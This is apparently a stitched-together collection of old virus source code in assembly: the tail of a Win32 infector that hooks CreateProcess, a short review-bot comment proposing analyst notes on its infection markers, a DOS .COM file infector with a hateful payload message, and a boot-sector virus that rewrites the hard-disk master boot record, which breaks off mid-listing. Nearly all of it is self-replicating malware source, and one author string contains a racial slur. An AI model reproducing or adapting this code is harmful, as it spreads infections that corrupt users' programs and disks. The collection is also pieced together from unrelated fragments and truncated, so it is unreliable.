esi, \ ; destination buffer for ANSI characters
ecx, \ ; size of destination buffer
NULL, \ ; ignore unmappable characters
NULL ; don't tell us about problems
jmp hookInfectDispatch
;on entry:
; [esp] : return address to caller
; [esp+4] -> [esp+28] : registers
; [esp+2c] : return address to process
; [esp+34] : commandline
hookInfectAnsi:
call @@delta
@@delta:pop ebp
sub ebp,offset @@delta
mov edi,[esp+34] ;get the filename
call [ebp+lstrlenA], \ ;calculate string length
edi ; (not including null terminator)
or eax,eax ;zero length?
jz hookInfectError
inc eax ;include null terminator
call [ebp+GlobalAlloc], \ ;allocate some memory for the copy
GMEM_FIXED, \
eax
or eax,eax ;no memory?
jz hookInfectError
mov esi,eax
call [ebp+lstrcpyA], \ ;*edi -> *esi
esi, \
edi
hookInfectDispatch:
push esi ;(*) argument for GlobalFree
call [ebp+GlobalAlloc], \ ;instantiate our global structure
GMEM_FIXED, \
L size vir_str
or eax,eax ;fatal error if no memory
jz hookInfectErrorFree
mov edi,eax
mov [edi+vir_str.lpFileName],esi
mov [edi+vir_str.ddError],FALSE ;assume no parsing fix-ups required
lodsb
cmp al,'"'
.if zero?
mov [edi+vir_str.lpFileName],esi
mov [edi+vir_str.ddError],TRUE ;parsing fix-ups required
.endif
hookInfectParse:
lodsb ;get a byte
.if [edi+vir_str.ddError] == TRUE ;need a fix-up?
cmp al,'"' ;'"' is our terminator
jnz hookInfectParse
.else ;no fix-up required
cmp al,' ' ;' ' or \0 is our terminator
jz hookInfectParsed
or al,al
jnz hookInfectParse
.endif
hookInfectParsed:
mov byte ptr [esi-1],NULL ;null terminate string
lea eax,[ebp+infectEXE] ;we're infecting a non-kernel32 executable
mov [edi+vir_str.lpInfectMethod],eax
call infect
call [ebp+GlobalFree], \ ;deallocate global structure
edi
hookInfectErrorFree:
call [ebp+GlobalFree] ;deallocate lpFileName
hookInfectError:
ret
hookCreateProcessW:
push CRC_POLY
CreateProcessW = dword ptr $ - 4
hookUnicode:
pushfd
pushad
call hookInfectUnicode
popad
popfd
ret
hookCreateProcessA:
push CRC_POLY
CreateProcessA = dword ptr $ - 4
hookAnsi:
pushfd
pushad
call hookInfectAnsi
popad
popfd
ret
className db '[Heretic] by Memory Lapse',0
message db 'For my thug niggaz.. uptown baby, uptown.',0
szKernel db '\KERNEL32.DLL',0
szImageHlp db 'IMAGEHLP',0
szChecksumMappedFile db 'CheckSumMappedFile',0
szSetupApi db 'SETUPAPI',0
szSetupInstallFileExA db 'SetupInstallFileExA',0
szWinInitFile db 'WININIT.INI',0
szAppName db 'Rename',0
szKeyName db 'NUL',0
name_ptr_api:
ddCloseHandle: crc
ddCopyFileA: crc
ddCreateFileA: crc
ddCreateFileMappingA: crc
ddDeleteFileA: crc
ddFreeLibrary: crc
ddGetFileAttributesA: crc
ddGetFileTime: crc
ddGetProcAddress: crc
ddGetSystemDirectoryA: crc
ddGetWindowsDirectoryA: crc
ddGlobalAlloc: crc
ddGlobalFree: crc
ddIsBadCodePtr: crc
ddLoadLibraryA: crc
ddMapViewOfFile: crc
ddSetFileAttributesA: crc
ddSetFileTime: crc
ddUnmapViewOfFile: crc
ddWideCharToMultiByte: crc
ddWritePrivateProfileStringA: crc
ddlstrcatA: crc
ddlstrcpyA: crc
ddlstrlenA: crc
name_ptr_api_end:
; absolute offsets of desired API
CloseHandle dd 0
CopyFileA dd 0
CreateFileA dd 0
CreateFileMappingA dd 0
DeleteFileA dd 0
FreeLibrary dd 0
GetFileAttributesA dd 0
GetFileTime dd 0
GetProcAddress dd 0
GetSystemDirectoryA dd 0
GetWindowsDirectoryA dd 0
GlobalAlloc dd 0
GlobalFree dd 0
IsBadCodePtr dd 0
LoadLibraryA dd 0
MapViewOfFile dd 0
SetFileAttributesA dd 0
SetFileTime dd 0
UnmapViewOfFile dd 0
WideCharToMultiByte dd 0
WritePrivateProfileStringA dd 0
lstrcatA dd 0
lstrcpyA dd 0
lstrlenA dd 0
_end:
host: call MessageBoxA, \
NULL, \
L offset lpText, \
L offset lpCaption, \
L 0 ;MB_OK
call ExitProcess, \
L 0
.data
lpCaption db 'Memory Lapse has something to say..',0
lpText db 'Hello World!',0
end start
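Review bot: The header comment (SYNOPSIS/ABSTRACT/NOTES) never records the artifacts an infected file or host carries, so anyone triaging this sample has to recover them from the `infect` and `kernel` routines. I would add a short analyst section under NOTES, for example `; Marker: pe_str.timestamp is set to the CRC-32 of MARKER and checked before infecting` and `; Last object is extended and gains IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_WRITE`. The same section should say that `kernel` places a copy of KERNEL32.DLL under the Windows directory and schedules the swap through the `Rename` section of WININIT.INI or through SetupInstallFileExA. It should also say that `exitTime` and `exitChmod` restore file times and attributes, so filesystem timestamps are not a usable indicator. Imports are resolved by CRC-32 of export names (`name_ptr_api`), so API names will not appear as strings in an infected image, while the literal strings from `className` through `szKeyName` will.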
+901
@@ -0,0 +1,901 @@
CODE segment para public 'code'
assume cs:code,ds:code,es:nothing,ss:nothing
org 100h
egy equ 1 ; one
dma equ 0b0h
atvar equ 300 ; at paramaeter
xtvar equ 1 ; xt parameter
suruseg equ 255 ; density
idotartalek equ 18*30 ; time delay
start: db 0e9h,0,0
;##################### Initialization ######################
resid: push ax
mov cx,offset memory - offset begin ;#### decoding ####
mov bx,ds:[101h]
add bx,103h+(offset begin-offset resid)
jhg1: xor byte ptr [bx],0
inc bx
loop jhg1
begin: sub bx,(offset begin-offset resid)+(offset memory - offset begin)
mov cs:[0feh],bx
mov ax,[bx+(offset eltarol-offset resid)]
mov cl,[bx+(offset eltarol-offset resid)+2]
mov ds:[100h],ax
mov ds:[102h],cl
mov cx,0b800h
mov ah,15
push bx
int 10h
pop bx
cmp al,7
jne rety
mov ch,0b0h
rety: mov [bx+(offset ruut - offset resid)+1],cx
mov word ptr [bx+(offset counter-offset resid)],idotartalek
mov byte ptr [bx+(offset jammed-offset resid)+1],al
mov byte ptr [bx+(offset vanesik-offset resid)],0
xor ax,ax
mov ds,ax
cmp word ptr ds:[130h],4142h
je zipp
mov ds:[130h],4142h
mov ax,cs
dec ax
mov ds,ax
mov ax,ds:[3]
sub ax,180h
mov ds:[3],ax
add ax,ds:[1]
mov es,ax
push cs
pop ds
sub word ptr ds:[2],384
mov di,3
mov si,bx
mov cx,(offset memory-offset resid) shr 1 +1
cld
rep movsw
mov ax,es
sub ax,10h
mov ds,ax
mov dx,offset irq
mov ax,251ch
int 21h
mov ah,2ah
int 21h
cmp al,1
jne zipp
dec al
out 0a0h,al
mov al,dma
out 41h,al
zipp:
mov ax,cs
mov ds,ax
mov es,ax
pop ax
push cs
mov cx,100h
push cx
mov cx,ds:[0feh]
sub cx,100h
retf
eltarol dw 20cdh
eltarol2 db 90h
;######################### Vyrus activated ##########################
csik: mov ax,0e000h
mov ds,ax
csiky: mov ds:[0],al
inc al
jmp csiky
;######################### propagation part ##########################
eredeti: db 0eah ; original
int211 dw 0
int212 dw 0
counter dw 0
szaporodas: cmp ah,4bh
jne eredeti
or al,al
jnz eredeti
push ax
push es
push bx
push ds
push dx
mov bx,dx
koj: inc bx
cmp byte ptr [bx],'.'
jne koj
cmp byte ptr[bx+1],'C'
jne kiugras1
mov cs:kds,ds
mov cs:kdx,dx
mov cs:kbx,bx
call probe
kiugras1: pop dx
pop ds
pop bx
pop es
pop ax
jmp eredeti
kds dw 0
kdx dw 0
kbx dw 0
kkk dw 0
fszam dw 0
probe: push cs
pop es
mov di,offset memory
mov si,dx
mov cx,40
cld
rep movsw
mov bx,0ff0h
mov ah,48h
int 21h
jnc juk1
ret
;!!!!! memoria lefoglalva (kkk = Seg)
atr dw 0
juk1: mov cs:kkk,ax
mov dx,offset memory
push ds
pop es
mov bx,cs:kbx
mov byte ptr [bx+1],'A'
call elorutin
push cs
pop ds ;DS:DX a masolt nev.
mov ax,4300h
int 21h
mov atr,cx
xor cx,cx
mov ax,4301h
int 21h
;!!!!! Attr allitas
cmp cs:attrflag,0
jz juk2
mov ds,cs:kds
jmp memoff
juk2: mov di,kdx ;ES:DI a regi nev atirva
mov ah,56h
int 21h
call utorutin ;!!!!! Atnevezve
mov dx,cs:kdx
push es
pop ds
mov ax,3d02h
int 21h ;!!!!! File megnyitva
mov cs:fszam,ax
mov ds,cs:kkk
xor dx,dx
mov bx,ax
mov cx,0fc00h-(offset memory-offset resid)
mov ah,3fh
int 21h
cmp ax,0fc00h-(offset memory-offset resid)
;!!!!! Beolvasva a program (csak a hossza miatt)
je hosszu ;zarjuk le a file-t
cmp ax,7580
jb hosszu ;tul rovid a file
mov di,ax
mov bx,ds:[1]
cmp word ptr [bx+3],0b950h
;$$$$$$$$$$$$$$$$$$$$$$$$$ FUCK OFF TASM,MASM $$$$$$$$$$$$$$$$$$$$$$$$$$$
je hosszu
push di
mov cx,(offset memory-offset resid)
mov si,offset resid
push ds
pop es
push cs
pop ds
inc byte ptr ds:[offset jhg1 +2]
mov ax,es:[0]
mov eltarol,ax
mov al,es:[2]
mov eltarol2,al
rep movsw ;!!!!! Atmasolva (hehe)
mov al,byte ptr ds:[offset jhg1 +2]
pop di
add di,(offset begin-offset resid)
mov cx,offset memory - offset begin ;#### coding ####
jhga: xor byte ptr es:[di],al
inc di
loop jhga
sub di,(offset memory - offset resid)
push di ;Az ugrasi hely
mov bx,fszam
mov cx,offset memory - offset begin
mov dx,di
push es
pop ds
mov ah,40h
int 21h
pop di
cmp ax,offset memory - offset begin
je ghj1
hosszu: jmp zardle
ghj1: ;!!!!! Kiirva a vege
mov byte ptr ds:[0],0e9h
sub di,3
mov ds:[1],di
mov bx,cs:fszam
xor cx,cx
xor dx,dx
mov ax,4200h
push bx
int 21h
pop bx
mov cx,3
xor dx,dx
mov ah,40h
int 21h
zardle: mov bx,cs:fszam
mov ah,3eh
int 21h ;!!!!! File lezarva
push cs
pop es
mov di,offset memory
mov ds,cs:kds
mov dx,cs:kdx
mov ah,56h
int 21h ;!!!!! File visszanevezve
mov bx,cs:kbx
mov byte ptr ds:[bx+1],'C'
mov ax,4301h
mov cx,cs:atr
int 21h ;!!!!! attr visszaall
memoff: mov bx,cs:kbx
mov byte ptr ds:[bx+1],'C'
push cs
pop ds
mov es,cs:kkk
mov ah,49h
int 21h ;!!!!! Memoria visszaalt
ret
it241 dw 0
it242 dw 0
attrflag db 0
elorutin: mov cs:attrflag,0
xor ax,ax
mov ds,ax
mov ax,ds:[90h]
mov cs:it241,ax
mov ax,ds:[92h]
mov cs:it242,ax
mov ds:[90h],offset it24
mov ds:[92h],cs
ret
utorutin: xor ax,ax
mov ds,ax
mov ax,cs:it241
mov ds:[90h],ax
mov ax,cs:it242
mov ds:[92h],ax
ret
it24: mov cs:attrflag,1
xor al,al
iret
vanesik db 0
irq: cli
push ds
push es
push ax
push bx
push cx
push dx
push si
push di
cmp cs:counter,0
je sabad
dec cs:counter
jne sabad
xor ax,ax
mov ds,ax
mov ax,ds:[84h]
mov cs:int211,ax
mov ax,ds:[86h]
mov cs:int212,ax
mov ds:[84h],offset szaporodas
mov ds:[86h],cs
sabad: cmp cs:vanesik,0
je keress
call idovan
jmp jumper
keress: call ruut
jumper: pop di
pop si
pop dx
pop cx
pop bx
pop ax
pop es
pop ds
iret
idovan: xor ah,ah
int 1ah
and dx,suruseg
jne rutyi
call action
rutyi: ret
ruut: mov ax,0b800h
mov es,ax
mov di,cs:did
mov cx,512
cld
poke: jcxz huy
mov al,'E'
repnz scasb
jz talalt
huy: cmp di,4095
jb kisebb
mov cs:did,0
ret
kisebb: add cs:did,512
ret
did dw 0
talalt: test di,1
jz poke
mov dl,es:[di+1]
mov dh,es:[di+3]
or dx,2020h
cmp dx,6973h ;'is'
jne poke
mov bl,es:[di+5]
or bl,20h
cmp bl,'k'
jne poke
mov cs:vanesik,1
jmp huy
action: mov ax,cs
mov ds,ax
mov es,ax
mov vanesik,0
mov pontszam,1
mov si,offset zizi
mov di,offset novi
cld
mov cx,6
rep movsw
call zoldseg
jammed: mov ax,3
int 10h
cmp counterr,atvar
jne fdr
push cs
pop es
lea bx,mess
mov ax,1301h
mov bx,1
xor dx,dx
mov cx,offset drt-offset mess
int 10h
fdr: ret
counterr dw 0
zoldseg: cli
mov di,offset memory
xor ax,ax
cld
mov cx,200*3
rep stosw
mov ah,0c0h
mov si,3333h
int 15h
cmp si,3333h
mov ax,xtvar
je xt
mov ax,atvar
xt: mov counterr,ax
mov ax,3502h
int 21h
cmp bx,0e9eh
jne ibm
call init1
mov pontm,100
mov port,22h
jmp entry
ibm: ;Ibm bulik
mov pontm,200
mov al,70h
mov port,60h ;%
mov ah,15
int 10h
cmp al,7
jne cga
call init3
jmp entry
cga: call init2
jmp entry
port dw 22h
pontm dw 100
init1: mov ax,200h
mov es,ax
xor di,di
mov cx,4000h
cld
xor ax,ax
rep stosw
mov plotdw,offset plot
mov unplotdw,offset unplot
ret
init2: mov ax,0b800h
mov es,ax
mov ax,6
int 10h
mov plotdw,offset plotcga
mov unplotdw,offset unplotcga
ret
init3: mov ax,0b000h
mov es,ax
call prog
mov plotdw,offset plotherc
mov unplotdw,offset unplotcga
ret
prog: mov dx,3bfh
mov al,3
out dx,al
mov al,28h
mov dx,3b8h
out dx,al
mov ah,0
mov cx,12
lea bx,ports
lopi1: mov dx,03b4h
mov al,ah
out dx,al
inc ah
mov dx,03b5h
mov al,[bx]
out dx,al
inc bx
loop lopi1
mov dx,3bfh
mov al,3
out dx,al
mov dx,3b8h
mov al,0ah
out dx,al
xor di,di
mov cx,4000h
xor ax,ax
cld
rep stosw
ret
ports db 35h,2dh,2eh,7,5bh,2,57h,57h,2,3,0,0
;**************************** Forgatorutin ************************************
even
sina dw 0
cosa dw 0 ;si-t meghagyja
sinb dw 0
cosb dw 0
pontszam dw 1
transzform: ;be: di=X, bx=Y, cx=Z, SINA,COSA,SINB,COSB
; add bx,ytol ;ez itt jolesz
shl di,1
shl bx,1 ;X es Y elokeszitese a szorzashoz
mov ax,di
imul cosa
mov bp,dx
mov ax,bx
imul sina
add bp,dx ; bp=X' = cosa*X + sina*Y
mov ax,bx
imul cosa
mov bx,dx
mov ax,di
imul sina
sub bx,dx ; bx=Y' = cosa*X - sina*Y
shl bp,1
shl cx,1 ;X' es Z elokeszitese
mov ax,bp
imul cosb
mov di,dx
mov ax,cx
imul sinb
sub di,dx ; di=X'' = cosb*X' - sinb*Z
mov cx,di
mov ax,bx
ret
comment @
mov ax,cx
imul cosb
mov cx,dx
mov ax,bp
imul sinb
add cx,dx ; cx=Z'' = cosb*Z = sinb*X'
; out: di=X'' bx=Y'' cx=Z''
mov dx,keptav
;****************************** PERSPEKTIVA **********************************
mov ax,di
shl ax,1
imul tavol
mov cx,dx
mov ax,bx
shl ax,1
imul tavol
mov ax,dx
ret ; ki : CX=X' AX=Y'
@
plotherc: ; al=y cx=x
xor ah,ah
mov dx,ax
shr dx,1
add ax,dx
mov dx,cx
mov cl,al
and cl,3
shr ax,1
shr al,1
mov di,2000h
shl di,cl
mov cl,90
mul cl
add di,ax
mov ax,dx
mov cx,dx
jmp ezisi
plotcga: xor di,di
shr ax,1
jnc tryp
mov di,2000h
tryp: mov dl,80
mul dl
add di,ax
mov ax,cx
ezisi: shr ax,1
shr ax,1
shr ax,1
add di,ax
and cl,7
mov al,128
shr al,cl
or es:[di],al
jmp ezis1
unplotcga: mov al,[bx]
mov di,[bx+1]
xor al,255
and es:[di],al
ret
plot: ;AL = y koord. cx = x koord.
mov dl,160
mul dl
mov di,ax
mov ax,cx
shr ax,1
shr ax,1
add di,ax
and di,-2
and cl,7
mov al,128
shr al,cl
or es:[di+egy],al
ezis1: mov [bx],al
inc bx
mov [bx],di
add bx,2
ret
unplot: mov al,[bx]
mov di,[bx+1]
xor al,255
and es:[di+egy],al
ret
kezdfazisrajz: mov bx,offset memory
mov si,offset gombdata
mov cx,pontszam
ck1: push cx
lodsw
mov cx,ax
shl cx,1
add cx,320
lodsw
add si,2
add ax,50
call word ptr [plotdw]
pop cx
loop ck1
ret
indy db 0
fazisrajz: mov bx,offset memory
mov si,offset gombdata
mov cx,pontszam
mov indy,1
ck12: push cx
call word ptr [unplotdw]
push bx
lodsw
mov di,ax
lodsw
mov bx,ax
lodsw
mov cx,ax
call transzform
pop bx
add ax,50
mov di,bxpo
add al,[di]
shl cx,1
add cx,bxpo2
cmp indy,0
je ruty
mov indy,0
cmp karal2,0
jne ruty
push cx
push ax
inc cx
call word ptr [plotdw]
pop ax
pop cx
sub bx,3
ruty: call word ptr [plotdw]
pop cx
loop ck12
ret
novpont: mov ax,pontm
cmp pontszam,ax
je trew
mov cx,pontm
sub cx,pontszam
mov ch,cl
shR cx,1
shr cx,1
yut: loop yut
inc pontszam
ret
trew: call movie
mov bx,bxpo
cmp bx,offset patt
je valto
cmp bx,offset patt+29
je valto
iuy: add bx,novi
mov bxpo,bx
ret
valto: neg novi
jmp iuy
novi dw -1
bxpo dw offset patt
bxpo2 dw 320
novi2 dw 4
karal dw 300
karal2 dw 600
zizi dw -1,offset patt,320,4,300,600
movie: cmp karal,0
je jesty
dec karal
ret
jesty: cmp karal2,0
je jesty2
dec karal2
jesty2: mov bx,bxpo2
cmp bx,100
je valto2
cmp bx,540
je valto2
iuy2: add bx,novi2
mov bxpo2,bx
ret
valto2: neg novi2
jmp iuy2
elokesz: call novpont
mov bl,szogx
xor bh,bh
shl bx,1
mov ax,sintabl[bx]
mov sina,ax
mov ax,costabl[bx]
mov cosa,ax
mov bl,szogy
xor bh,bh
shl bx,1
mov ax,sintabl[bx]
mov sinb,ax
mov ax,costabl[bx]
mov cosb,ax
mov al,szogxvalt
add szogx,al
mov al,szogyvalt
add szogy,al
ret
even
szogx db 0
szogy db 0
szogxvalt db 2
szogyvalt db 5
tavol dw 32767
phase: call elokesz
call fazisrajz
ret
entry: call kezdfazisrajz
rajta1: call phase
cmp pontm,100
je apc
cmp byte ptr ds:[offset ruut +2],0b8h
je ccggaa
mov cx,counterr
mov dx,3bah
qaz1: in al,dx
and al,1
jnz qaz1
qaz2: in al,dx
and al,1
jz qaz2
loop qaz1
jmp apc
ccggaa: mov dx,3dah
qaz3: in al,dx
and al,8
jnz qaz3
qaz4: in al,dx
and al,8
jz qaz4
apc: mov dx,port
in al,dx
and al,1
jz rajta1
ret
even
plotdw dw 0
unplotdw dw 0
sintabl dw 0, 804, 1608, 2410, 3212, 4011, 4808, 5602, 6393
dw 7179, 7962, 8739, 9512, 10278, 11039, 11793, 12539, 13279
dw 14010, 14732, 15446, 16151, 16846, 17530, 18204, 18868, 19519
dw 20159, 20787, 21403, 22005, 22594, 23170, 23731, 24279, 24811
dw 25329, 25832, 26319, 26790, 27245, 27683, 28105, 28510, 28898
dw 29268, 29621, 29956, 30273, 30571, 30852, 31113, 31356, 31580
dw 31785, 31971, 32137, 32285, 32412, 32521, 32609, 32678, 32728
dw 32757, 32767, 32757, 32728, 32678, 32609, 32521, 32412, 32285
dw 32137, 31971, 31785, 31580, 31356, 31113, 30852, 30571, 30273
dw 29956, 29621, 29268, 28898, 28510, 28105, 27683, 27245, 26790
dw 26319, 25832, 25329, 24811, 24279, 23731, 23170, 22594, 22005
dw 21403, 20787, 20159, 19519, 18868, 18204, 17530, 16846, 16151
dw 15446, 14732, 14010, 13279, 12539, 11793, 11039, 10278, 9512
dw 8739, 7962, 7179, 6393, 5602, 4808, 4011, 3212, 2410
dw 1608, 804, 0, -804, -1608, -2410, -3212, -4011, -4808
dw -5602, -6393, -7179, -7962, -8739, -9512,-10278,-11039,-11793
dw -12539,-13279,-14010,-14732,-15446,-16151,-16846,-17530,-18204
dw -18868,-19519,-20159,-20787,-21403,-22005,-22594,-23170,-23731
dw -24279,-24811,-25329,-25832,-26319,-26790,-27245,-27683,-28105
dw -28510,-28898,-29268,-29621,-29956,-30273,-30571,-30852,-31113
dw -31356,-31580,-31785,-31971,-32137,-32285,-32412,-32521,-32609
dw -32678,-32728,-32757,-32767,-32757,-32728,-32678,-32609,-32521
dw -32412,-32285,-32137,-31971,-31785,-31580,-31356,-31113,-30852
dw -30571,-30273,-29956,-29621,-29268,-28898,-28510,-28105,-27683
dw -27245,-26790,-26319,-25832,-25329,-24811,-24279,-23731,-23170
dw -22594,-22005,-21403,-20787,-20159,-19519,-18868,-18204,-17530
dw -16846,-16151,-15446,-14732,-14010,-13279,-12539,-11793,-11039
dw -10278, -9512, -8739, -7962, -7179, -6393, -5602, -4808, -4011
dw -3212, -2410, -1608, -804
costabl dw 32767, 32757, 32728, 32678, 32609, 32521, 32412, 32285
dw 32137, 31971, 31785, 31580, 31356, 31113, 30852, 30571
dw 30273, 29956, 29621, 29268, 28898, 28510, 28105, 27683
dw 27245, 26790, 26319, 25832, 25329, 24811, 24279, 23731
dw 23170, 22594, 22005, 21403, 20787, 20159, 19519, 18868
dw 18204, 17530, 16846, 16151, 15446, 14732, 14010, 13279
dw 12539, 11793, 11039, 10278, 9512, 8739, 7962, 7179
dw 6393, 5602, 4808, 4011, 3212, 2410, 1608, 804
dw 0, -804, -1608, -2410, -3212, -4011, -4808, -5602
dw -6393, -7179, -7962, -8739, -9512,-10278,-11039,-11793
dw -12539, -13279,-14010,-14732,-15446,-16151,-16846,-17530
dw -18204, -18868,-19519,-20159,-20787,-21403,-22005,-22594
dw -23170, -23731,-24279,-24811,-25329,-25832,-26319,-26790
dw -27245, -27683,-28105,-28510,-28898,-29268,-29621,-29956
dw -30273, -30571,-30852,-31113,-31356,-31580,-31785,-31971
dw -32137, -32285,-32412,-32521,-32609,-32678,-32728,-32757
dw -32767, -32757,-32728,-32678,-32609,-32521,-32412,-32285
dw -32137, -31971,-31785,-31580,-31356,-31113,-30852,-30571
dw -30273, -29956,-29621,-29268,-28898,-28510,-28105,-27683
dw -27245, -26790,-26319,-25832,-25329,-24811,-24279,-23731
dw -23170, -22594,-22005,-21403,-20787,-20159,-19519,-18868
dw -18204, -17530,-16846,-16151,-15446,-14732,-14010,-13279
dw -12539, -11793,-11039,-10278, -9512, -8739, -7962, -7179
dw -6393, -5602, -4808, -4011, -3212, -2410, -1608, -804
dw 0, 804, 1608, 2410, 3212, 4011, 4808, 5602
dw 6393, 7179, 7962, 8739, 9512, 10278, 11039, 11793
dw 12539, 13279, 14010, 14732, 15446, 16151, 16846, 17530
dw 18204, 18868, 19519, 20159, 20787, 21403, 22005, 22594
dw 23170, 23731, 24279, 24811, 25329, 25832, 26319, 26790
dw 27245, 27683, 28105, 28510, 28898, 29268, 29621, 29956
dw 30273, 30571, 30852, 31113, 31356, 31580, 31785, 31971
dw 32137, 32285, 32412, 32521, 32609, 32678, 32728, 32757
gombdata:
DW 44, 3, 22, 29, 6, 40, 7, 9, 48,-14, 12, 46
DW -33, 15, 33,-44, 18, 14,-44, 21, -7,-35, 24,-25
DW -19, 26,-37, 0, 29,-40, 17, 31,-34, 29, 34,-21
DW 33, 36, -5, 30, 38, 9, 20, 40, 20, 8, 42, 25
DW -3, 43, 23,-12, 45, 17,-16, 46, 8,-15, 47, 0
DW -11, 48, -5, -5, 49, -7, 0, 49, -6, 0, 49, -2
DW 0, 49, 0, -2, 49, 0, -6, 49, 0, -7, 49, -5
DW -5, 48,-11, 0, 47,-15, 8, 46,-16, 17, 45,-12
DW 23, 43, -3, 25, 42, 8, 20, 40, 20, 9, 38, 30
DW -5, 36, 33,-21, 34, 29,-34, 31, 17,-40, 29, 0
DW -37,26,-19,-25,24,-35,-7,21,-44,14,18,-44
DW 33,15,-33,46,12,-14,48,9,7,40,6,29
DW 22,3,44,0,0,49,-22,-3,44,-40,-6,29
DW -48,-9,7,-46,-12,-14,-33,-15,-33,-14,-18,-44
DW 7,-21,-44,25,-24,-35,37,-26,-19,40,-29,0
DW 34,-31,17,21,-34,29,5,-36,33,-9,-38,30
DW -20,-40,20,-25,-42,8,-23,-43,-3,-17,-45,-12
DW -8,-46,-16,0,-47,-15,5,-48,-11,7,-49,-5
DW 6,-49,0,2,-49,0,0,-49,0,0,-49,-2
DW 0,-49,-6,5,-49,-7,11,-48,-5,15,-47,0
DW 16,-46,8,12,-45,17,3,-43,23,-8,-42,25
DW -20,-40,20,-30,-38,9,-33,-36,-5,-29,-34,-21
DW -17,-31,-34,0,-29,-40,19,-26,-37,35,-24,-25
DW 44,-21,-7,44,-18,14,33,-15,33,14,-12,46
DW -7,-9,48,-29,-6,40,-44,-3,22,-49,0,0
DW -44,3,-22,-29,6,-40,-7,9,-48,14,12,-46
DW 33,15,-33,44,18,-14,44,21,7,35,24,25
DW 19,26,37,0,29,40,-17,31,34,-29,34,21
DW -33,36,5,-30,38,-9,-20,40,-20,-8,42,-25
DW 3,43,-23,12,45,-17,16,46,-8,15,47,0
DW 11,48,5,5,49,7,0,49,6,0,49,2
DW 0,49,0,2,49,0,6,49,0,7,49,5
DW 5,48,11,0,47,15,-8,46,16,-17,45,12
DW -23,43,3,-25,42,-8,-20,40,-20,-9,38,-30
DW 5,36,-33,21,34,-29,34,31,-17,40,29,0
DW 37,26,19,25,24,35,7,21,44,-14,18,44
DW -33,15,33,-46,12,14,-48,9,-7,-40,6,-29
DW -22,3,-44,0,0,-49,22,-3,-44,40,-6,-29
DW 48,-9,-7,46,-12,14,33,-15,33,14,-18,44
DW -7,-21,44,-25,-24,35,-37,-26,19,-40,-29,0
DW -34,-31,-17,-21,-34,-29,-5,-36,-33,9,-38,-30
DW 20,-40,-20,25,-42,-8,23,-43,3,17,-45,12
DW 8,-46,16,0,-47,15,-5,-48,11,-7,-49,5
DW -6,-49,0,-2,-49,0,0,-49,0,0,-49,2
DW 0,-49,6,-5,-49,7,-11,-48,5,-15,-47,0
DW -16,-46,-8,-12,-45,-17,-3,-43,-23,8,-42,-25
DW 20,-40,-20,30,-38,-9,33,-36,5,29,-34,21
DW 17,-31,34,0,-29,40,-19,-26,37,-35,-24,25
DW -44,-21,7,-44,-18,-14,-33,-15,-33,-14,-12,-46
DW 7,-9,-48,29,-6,-40,44,-3,-22,49,0,0
patt: DB 0, 0, 0, 0, 0, 1, 1, 2, 4, 5, 7, 9,11,14,17,20,23,27
db 31,35,40,45,50,56,61,67,73,80,86,93
mess db 'HARD HIT & HEAVY HATE the HUMANS !!'
db ' [ H.H.& H.H. the H. ] '
drt dw 5 dup (0)
memory:
CODE ENDS
END START
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
+213
@@ -0,0 +1,213 @@
NAME boot
PAGE 55,132
TITLE FILE UTIL
code segment
ASSUME CS:CODE,DS:CODE,ES:CODE
org 100h
main: jmp over
db '['
id db 'HiDos]',0
by db 'By Apache',0
over: xor ax,ax
mov ds,ax
cli
mov ss,ax
mov sp,7c00h
sti
mov ax,ds:[004eh]
mov word ptr ds:[int13+7b02h],ax
mov ax,ds:[004ch]
mov word ptr ds:[int13+7b00h],ax
mov ax,ds:[0413h]
dec ax
dec ax
mov ds:[0413h],ax
mov cl,06h
shl ax,cl
mov es,ax
mov word ptr ds:[bigj+7b02h],es
mov ax,offset jumpt
mov word ptr ds:[bigj+7b00h],ax
mov cx,0400h
push cs
pop ds
mov si,7c00h
mov di,0100h
cld
repz
movsb
push cs
pop ds
jmp cs:[bigj+7b00h]
jumpt: push cs
pop ds
mov si,offset drive
cmp byte ptr ds:[si],80h
jz hdone
mov bx,0300h
mov cx,0001h
mov dx,0080h
push cs
pop es
call hdread
cmp ds:[0304h],'iH'
jz hdone
mov bx,0300h
mov cx,0007h
mov dx,0080h
call hdwrit
mov si,04beh
mov di,02beh
mov cx,0042h
cld
repz
movsb
mov byte ptr ds:[drive],80h
mov bx,0100h
mov cx,0001h
mov dx,0080h
call hdwrit
mov byte ptr ds:[drive],00h
hdone: xor ax,ax
mov word ptr cs:[boot+2],ax
mov es,ax
push cs
pop ds
mov ax,0201h
mov bx,7c00h
mov word ptr ds:[boot],bx
mov si,offset drive
cmp byte ptr ds:[si],80h
jz hload
mov cx,0003h
mov dx,0100h
jmp fload
hload: mov cx,0007h
mov dx,0080h
fload: mov di,'rv'
int 13h
mov si,offset drive
mov byte ptr cs:[si],00h
xor ax,ax
mov es,ax
mov ds,ax
mov ax,offset nint13
mov ds:[004ch],ax
mov ds:[004eh],cs
push cs
pop ds
jmp cs:[boot]
hdwrit: mov ax,0301h
mov di,'rv'
jmp xx4
hdread: mov ax,0201h
mov di,'rv'
xx4: int 13h
ret
nint13: cmp di,'rv'
jz iv13
cmp ah,02h
jnz wcheck
cmp cl,01h
jnz wcheck
cmp dh,00h
jnz wcheck
cmp dl,80h
jz check1
cmp dl,00h
jnz wcheck
check1: push ax
push bx
push cx
push dx
push ds
push es
push di
mov bx,0300h
push cs
pop es
call hdread
mov si,offset [id+0200h]
cmp es:[si],'iH'
jz redirect
jmp iflopd
redirect: cmp dl,80h
jnz rdirfl
pop di
pop es
pop ds
pop dx
pop cx
pop bx
pop ax
mov cx,0007h
jmp a13
rdirfl: pop di
pop es
